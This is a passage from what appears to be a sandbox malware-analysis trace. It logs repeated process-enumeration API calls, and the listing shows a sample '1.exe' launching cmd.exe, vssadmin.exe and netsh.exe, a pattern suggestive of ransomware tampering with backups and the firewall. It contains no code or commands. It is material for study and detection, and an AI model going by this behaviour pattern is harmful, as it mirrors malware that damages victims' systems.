cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.090] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0056.090] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0056.091] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.092] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.092] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0056.093] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0056.094] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.094] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0056.095] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0056.096] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0056.096] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0056.097] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.098] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.098] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0056.465] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0056.466] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0056.466] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0056.467] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.468] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0056.468] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0056.469] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0056.470] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0056.470] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0056.471] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0056.472] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0056.472] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0056.473] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0056.474] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0056.515] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0056.516] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0056.516] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0056.517] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0056.518] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0056.518] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0056.519] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0056.520] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0056.521] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0056.522] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0056.523] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0056.524] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0056.525] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0056.526] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0056.526] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.527] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.528] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.529] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0056.529] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0056.530] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.531] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.532] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.533] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.533] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.534] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0056.535] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.536] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0056.536] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0056.537] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.538] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0056.538] CloseHandle (hObject=0x324) returned 1 [0056.538] Sleep (dwMilliseconds=0x1f4) [0057.166] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x334 [0057.224] Process32FirstW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0057.225] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0057.226] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0057.226] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.227] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0057.228] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.228] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0057.229] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0057.230] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0057.231] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.231] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0057.232] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0057.233] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.233] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0057.234] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.235] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.235] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.236] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.237] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.237] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.238] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.239] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.239] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.240] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0057.241] Process32NextW (in: hSnapshot=0x334, 